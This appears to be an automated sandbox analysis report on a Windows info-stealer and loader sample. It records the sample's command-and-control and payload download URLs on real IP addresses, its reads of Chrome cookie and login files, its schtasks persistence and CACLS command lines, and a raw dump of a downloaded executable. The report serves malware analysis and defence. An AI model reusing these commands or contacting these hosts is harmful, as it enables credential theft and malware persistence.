__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1
__exception__ Aug. 2, 2023, 4:50 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 0 registers.r15: 0 registers.rcx: 3667120 registers.rsi: 0 registers.r10: 0 registers.rbx: 5365563435 registers.rsp: 3669032 registers.r11: 514 registers.r8: 0 registers.r9: 0 registers.rdx: 0 registers.r12: 0 registers.rbp: 1993721121 registers.rdi: 0 registers.rax: 1993369933 registers.r13: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.15.156.208/jd9dd3Vw/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.15.156.208/jd9dd3Vw/index.php?scr=1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.180.49.153/udp/taskmask.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.180.49.153/udp/rdpcllp.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.180.49.153/udp/taskhostclp.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/ip

Performs some HTTP requests (6 events)

request	POST http://45.15.156.208/jd9dd3Vw/index.php
request	POST http://45.15.156.208/jd9dd3Vw/index.php?scr=1
request	GET http://194.180.49.153/udp/taskmask.exe
request	GET http://194.180.49.153/udp/rdpcllp.exe
request	GET http://194.180.49.153/udp/taskhostclp.exe
request	GET https://api.ip.sb/ip

Sends data using the HTTP POST Method (2 events)

request	POST http://45.15.156.208/jd9dd3Vw/index.php
request	POST http://45.15.156.208/jd9dd3Vw/index.php?scr=1

Allocates read-write-execute memory (usually to unpack itself) (50 out of 99 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 2, 2023, 4:56 p.m.	process_identifier: 2568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:56 p.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:56 p.m.	process_identifier: 2568 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:51 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000003f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c62000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2212 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x729a2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7234b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72361000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72362000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x712ba000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fa81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732a1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d311000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75bf1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73111000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 2, 2023, 4:57 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe
file	C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe
file	C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe
file	C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe
file	C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe
file	C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe
file	C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 2, 2023, 4:56 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe	1	1
ShellExecuteExW Aug. 2, 2023, 4:57 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Aug. 2, 2023, 4:57 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\eb0f58bce7" /P "test22:N"&&CACLS "..\eb0f58bce7" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Aug. 2, 2023, 4:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000127001\taskmask.exe	1	1
ShellExecuteExW Aug. 2, 2023, 4:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000128101\rdpcllp.exe	1	1
ShellExecuteExW Aug. 2, 2023, 4:57 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000129001\taskhostclp.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 2, 2023, 4:56 p.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x003e0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 2, 2023, 4:57 p.m.	flags: 1158 family: 0	1	0	0

An executable file was downloaded by the process oneetx.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 2, 2023, 4:57 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÎøLÏ"""ò!"ò'-"ò&"êã&"êã!"ò#"#Ð"êã'Á"îã'"îã "Rich"PELdBÉdà Ê ®®à @ð@0ÂP`&PGÐõ 8èô @À0.textÉ Ê `.rdataöà Ð @@.data>"l@À.idata À@@.Sa2day$jÐl@À.00cfg@@@.relocMUPV @B.hdffs2x3 °4 `@ÌÌÌÌÌéVðéÿ éÖûé+kéR3éG4éÓuéÏé½¸é~óé[¥ééá³éé¬wéKëé éyéeéé,$éä»éÖéÁÔé'ét¨éé6éÔPéòíéÿ été&é³éÙÅéàé®Þéøéé¸åéSÈéð»étéC[éÜéÐ¥éÛ-éÒæé¦Rée ér$ éU¾é×ÊéÑêéd>éÇ¿é×ÉécUéûBé}¥é,yé ÍéB~épËé²èéñéuÊé$©éÏÅéôGéÔé9jéséÀéJaéÎ§éu'éYéÏ§év>éd¤ééÆ¬é® é®déÎéBévé£Åé®yéséôåéßé§yéõ( é8é,Jé"éPé¶ÒéTé¸Gé[óéÔîéó`éíHéBéNòéÑé®ùéÕé{¾éò~é±é¿UéééÃ\éÁéØéÐééé¥6éhØéé:éËÓéné+ÆéÂéàéTLéÉécé~éséMék\é¸òéÇíéËÎéU]éÎvéANéÅÙéJvéüÔéó£é^éÚé¢~éÐé>vé>séÄoéu¯éeég}éé²Æé®®éKé+é§ é é&ékåé éÚyéÒé©÷éÚéýêé_%é»é4éYé]é¸é»íé+)éÆé<Mélé,ùéEéIVéøØé8é@égé é ÅéÏÇé\|Xé[µé¦é0ré±ãéSéwïéj~éóJéé¦~é#£é¦xé>¡é¦yéã/ééY4éKé]ýé¤éã$éjüéÌé3éøyéÒ¶éðé2éSéÊÍéÜéRéÌÁé¸é6réïÁéé÷Ëé×øédéL]éÛÔé¿5éó é&ÁéVàéÛéé9é~ué{HésGé4Ié\\|éké-é?`éÄéÊéìSéEÆéLèéEdéñéJéRàéßOéïMé4é¶éFéiùété?iéFé&§éÀKéà'éu]éOé©é·xéùéôé;é§Oé>éùyéÕWé×é ééVé0é´Dé{Ìé#ÖéÁäéèéA²é®é±éþçé{é~ÛéIéVégé3MéÌGééø4étéh÷é¢-éåéÞéãÍéÂé1ËéÄévúéÑ;é¿áé{éùéé¬±éTéerééé³oé»!é8é°Jé$JééÆãéÈáé«Hé-éâéquéÇîéRéé¤¾é-séré.sééýVéù éÓìéénàé"Xééßéµðéñpé ?éb¿éPépZéa#éVé¦é¿éÜ)éG{é1æé¢! é[±é¾é2 édéNéæ`éëé,÷éRøé/éGßéPìééiÊé6qéÌéüédéôèéæSé5Äé=éÜé¿âé~; éÉpé$ÙépZé ^éâéÓèéÏuéjé\Þé0>é+éHüéýéOGéVé¬µéHé1éÝèépéÿ¤éü~é¥±éétëé°QéXééKÚé®é)qéÓÕé{ é"ÏéYëéºdéééØé< é8'é^>é¨JéGAééù{éûTéBjép'éèé&¾é¸méE%éÑ¤éKé!(é¹éóéÕ½éïËé4^é é'éØéôßéxé.¹é° é¿Çéö?éÍéôéùé éG[éÚé\qéL% éé>ÝéÃ¾éW½éýºéìéWhéÖÀéëé¤ªé~áéP#é×ézvéFðéWé é2&éãé¾5éöéEËéAÀéæécJéÃéHé¦Ké éÇXéÝÎé+éé¹éöéëé0érÑéàévVév request_handle: 0x00cc000c	1	1	0
